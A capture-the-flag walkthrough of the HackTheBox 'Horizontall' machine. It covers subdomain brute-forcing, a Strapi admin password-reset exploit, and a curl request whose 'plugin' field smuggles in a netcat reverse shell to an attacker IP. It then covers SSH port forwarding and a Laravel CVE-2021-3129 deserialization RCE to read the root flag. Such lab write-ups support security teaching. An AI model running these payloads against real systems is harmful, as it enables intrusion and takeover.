HackTheBox: Horizontall
HTB - HORIZONTALL
ENUMERATION
MACHINE IP
export IP=10.10.11.105
NMAP SCAN RESULT
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Enumerating/Exploring Web Resources
http://10.10.11.105
will redirect tohttp://horizontall.htb/
So add this to
/etc/hosts
echo "10.10.11.105 horizontall.htb">> /etc/hosts
Nothing Found in web panel
Trying Directory Bruteforcing
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.105/ -t 100 -x php,txt,js,html,jpg -q
Nothing Useful Found in Directory Bruteforcing
As this is a
nginx
server with anginx
reverse proxy and IP was earlier autoresolved when tried to browse.So we can try for Subdomain Enumeration or Bruteforcing
Using Gobuster for subdomain Bruteforcing
gobuster dns -d horizontall.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
- Found interesting Subdomain
Found: api-prod.horizontall.htb
- Add this subdomain to
/etc/hosts
echo "10.10.11.105 api-prod.horizontall.htb">> /etc/hosts
Nothing interesting found on the subdomain
Trying Further Directory Bruteforcing to this subdomain using gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://api-prod.horizontall.htb/ -t 100 -x php,txt,js,html,jpg -q
- Found Interesting Directories
/index.html (Status: 200) [Size: 413]
/reviews (Status: 200) [Size: 507]
/users (Status: 403) [Size: 60]
/admin (Status: 200) [Size: 854]
/Reviews (Status: 200) [Size: 507]
/robots.txt (Status: 200) [Size: 121]
/Admin (Status: 200) [Size: 854]
/REVIEWS (Status: 200) [Size: 507]
Checking Directoriesn manual
/reviews or /Reviews contains some reviews of users and the usernames
[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]
- Users
wail - id=1
doe - id=2
john - id =3
/users gave 403 (Forbidden)
/robots.txt, Nothing found here
Found One more directory using Burp Active Scanning
/users-permissions/init
- Response from this directory
{"hasAdmin":true}
- So we can predict that the admin account is enabled.
Getting Reverse Shell
- After Further research we found that this stripe web panel is Vulnerable to Password Reset Vulnerability
https://www.exploit-db.com/exploits/50239
- We can Download this Exploit and run it, it will give new reseted password and the JSON Token
- The Authentication JSON token can be used in below request to get reverse shell.
curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMxMTY0NjMyLCJleHAiOjE2MzM3NTY2MzJ9.cuZYWzy1Y7hk-ajhlHExSWxDVGbJqkWXmuhxUZzSzG8' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f)\",\"port\":\"80\"}' $'http://api-prod.horizontall.htb/admin/plugins/install'
- For More Details About this Check out this blog
https://bittherapy.net/post/strapi-framework-remote-code-execution/
We should have got the reverse shell
We can find the user flag
/home/developer/user.txt
PRIVILEDGE ESCALATION
Running linpeas.sh
Got Some open Ports
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1856/node /usr/bin/
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
- Here on port:8000 at localhost
curl 0.0.0.0:8000 > index.html
We can see that the
Laravel
is Running at versionLaravel v8 (PHP v7.4.18)
We found that this Laravel Version is Vulnerable to RCE with
CVE-2021-3129
After further Research Found this Github Repo to Exploit this vulnerability.
https://github.com/ambionics/laravel-exploits
Port Forwarding using SSH
Port 8000 is the local port of USER Machine So we need that port to our Attacker Machine.
We can use SSH Port Forwarding For That.
- STEPS TO PORT FORWARDING
Create a SSH Key Pair
ssh-keygen -t rsa
Put PUBLIC KEY inside the User Machine(Hacked Machine) under
/opt/strapi/.ssh/authorized_keys
, Hereauthorized_key
is the file containing the Public key (Its not a folder)Use Private Key from Attacker Machine to connect back to User Machine and create Port Forwarding to Port 8000
ssh -L 8000:localhost:8000 [email protected] -i keypair
- (Here Keypair is the Private Key generated Earlier)
- Now after Successful connection, try to browser the port 8000 from your Machine.
curl 0.0.0.0:8000
, So we should have the successfull port forwording. Now we can use the exploit.
- Now We can use the RCE to get the root flag. Follow the github repo instructions mentioned in repo.
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared
- Lets Modify this to get the Root Flag.
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
- Output
python3 laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d31c599c35924f3afdd3447c96c8ea65
--------------------------
+ Logs cleared
- We should have got the Root Flag.